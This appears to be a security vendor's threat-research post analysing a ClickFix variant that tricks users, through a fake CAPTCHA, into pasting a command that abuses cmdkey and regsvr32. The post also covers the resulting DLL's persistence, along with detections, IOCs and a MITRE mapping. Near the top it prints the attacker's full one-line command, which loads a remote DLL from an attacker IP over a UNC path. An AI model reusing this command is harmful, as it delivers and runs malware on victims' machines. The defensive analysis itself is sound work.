SPEAK WITH AN EXPERT

Beyond PowerShell: Analyzing the Multi-Action ClickFix Variant

Contributors: Deepak Nayak, Kithu Shajil, & Veena Sagar

Executive Summary

This research documents a newly observed ClickFix variant observed by the CyberProof Threat Research Team, that continues to evolve beyond traditional payload delivery techniques by abusing native Windows utilities—specifically cmdkey and regsvr32. In this campaign, victims are socially engineered into executing a single malicious command via the Windows Run dialog (Win + R). That command chains multiple actions to stage credentials, retrieve a remote DLL, and execute it silently. By relying exclusively on trusted Windows components and avoiding obvious malware drops, the attacker achieves a high degree of stealth while maintaining execution reliability.

CyberProof continues to track and analyze emerging ClickFix variants as adversaries refine their use of native Windows utilities and social engineering. To learn more about CyberProof’s ongoing research into ClickFix techniques and their continued evolution, explore our additional analysis covering related variants and abuse patterns observed in the wild:

Attack Overview

The initial access vector mirrors earlier ClickFix campaigns. A phishing page masquerading as a CAPTCHA challenge instructs the user to execute a pasted command using the Run dialog (Win + R, Ctrl + V, Enter). This single user action initiates a multi‑stage execution chain without dropping an initial executable to disk.

Observed Command:

C:\WINDOWS\system32\cmd.exe /c
cmdkey /add:151.245.195.142 /user:guest &&
start regsvr32 /s \\151.245.195.142\hi\demo.dll &
REM I am not a robot – Cloudflare ID: d7f5a3335794c434

What’s Happening:

  • cmdkey stores credentials for remote access
  • regsvr32 loads and executes a remote DLL
  • UNC path (\IP\share) retrieves the payload from attacker infrastructure
  • Command chaining (&&, &) enables multiple actions in a single execution
  • REM comment is used to disguise malicious intent

This compact execution chain allows several attacker objectives to be met through a single user‑initiated command.

Infographic showing six steps of the ClickFix Variant abuse attack chain, from fake CAPTCHA to dynamic retrieval, detailing each stage of the exploitation process using Multi-Action techniques.

Figure 1: Attack chain summary

Technical Analysis

The retrieved file, demo.dll, is a 64‑bit Windows DLL whose primary function is to establish persistence and facilitate execution of a second‑stage payload.

Screenshot of code creating a process to run notepad with a remote XML file—an activity often linked to the ClickFix malware variant—then closing process and thread handles using CloseHandle functions.

Figure 2: Establishing persistence and execute second stage payload.

When executed via regsvr32, the DLL’s DllRegisterServer export launches a hidden CreateProcessA call that creates a scheduled task using schtasks.

Notably, the task definition is not stored locally. Instead, it is pulled from a remote XML file hosted on attacker‑controlled SMB infrastructure at 151.245.195[.]142. The scheduled task—named RunNotepadNow—is deliberately crafted to appear benign and blend into normal Windows activity. The actual second-stage payload lives in the XML on the C2 server. At time of p:ublication the C2 server was down.

Key Observations:

  • Scheduled task is created from a remote XML file
  • Payload behavior can be changed dynamically
  • No need to redeploy the initial DLL
  • Supports long‑term persistence with minimal host artifacts

Command and Control Behavior:

The malware communicates with attacker‑controlled infrastructure to:

  • Retrieve scheduled task configuration (XML)
  • Fetch second‑stage payloads
  • Maintain execution flexibility over time

This architecture allows attackers to modify behavior without altering the initially deployed binary, significantly complicating detection and response efforts.

Why This Matters:

This ClickFix variant reflects a continued maturation of the technique:

  • Moves beyond PowerShell and rundll32
  • Introduces cmdkey + regsvr32 command chaining
  • Combines credential staging with remote execution
  • Relies exclusively on trusted Windows LOLBins

The result is a low‑noise, high‑confidence execution path that aligns closely with user‑initiated behavior.

A computer security dashboard displays incident and alert logs with details about affected devices and specific threat events, including PowerShell activity, plus a side panel showing investigation information.

Figure 3: Malicious Command Execution via Run Dialog

Detection Opportunities:

This activity can be identified through the following signals:

  • Execution of cmd.exe with chained operators (&&, &)
  • Use of cmdkey targeting external IP addresses
  • regsvr32 loading DLLs from UNC paths
  • Remote DLL execution (\\IP\share\*.dll)
  • Scheduled task creation from remote XML definitions

Hunting Queries

Sample hunting queries, YARA rules, and Sigma detections are included in the source document for immediate operationalization.

A Kusto Query Language (KQL) script filters device process events for "cmd.exe" and specific commands, analyzing DLL references and listing relevant process details by timestamp, similar to PowerShell's Multi-Action ClickFix capabilities.

YARA

Screenshot of a YARA rule named Dropper_ScheduledTask_UNC_RunNotepadNow that detects DLL register server malware activity, including Multi-Action threats, using defined strings and hexadecimal patterns.

Sigma — Suspicious Scheduled Task from UNC XML

A Sigma rule configuration is shown, analyzing scheduled task creation from a remote UNC path using XML and PowerShell, with defined logsource, detection, and related MITRE ATT&CK techniques.

Indicators of Compromise

  • 151[.]245.195.142
  • \\151[.]245.195.142\hi\demo.dll
  • \\151[.]245.195.142\hi\777.xml
  • b2d9a99de44a7cd8faf396d0482268369d14a315edaf18a36fa273ffd5500108

Recommendations

  • Monitor cmdkey usage involving external IP addresses
  • Detect regsvr32 loading remote DLLs
  • Alert on chained command execution via cmd.exe
  • Monitor Task Scheduler activity sourcing remote XML files
  • Restrict or closely monitor outbound SMB/UNC access
  • Continue user education on ClickFix‑style social engineering

Mitre Mapping:

TacticTechnique
ExecutionT1218.010 — Regsvr32
PersistenceT1053.005 — Scheduled Task
Command & ControlT1071.002 — SMB/Win Admin Shares
Defense EvasionT1036.005 — Masquerading
Defense EvasionT1564.003 — Hidden Window
Defense EvasionT1027 — Obfuscated Files
DiscoveryT1082 — System Information

Conclusion

This ClickFix variant underscores how attackers increasingly rely on native Windows utilities and carefully constructed command chains to execute payloads and establish persistence. By shifting execution into trusted binaries and remote infrastructure, adversaries reduce detection visibility while increasing the likelihood of successful compromise.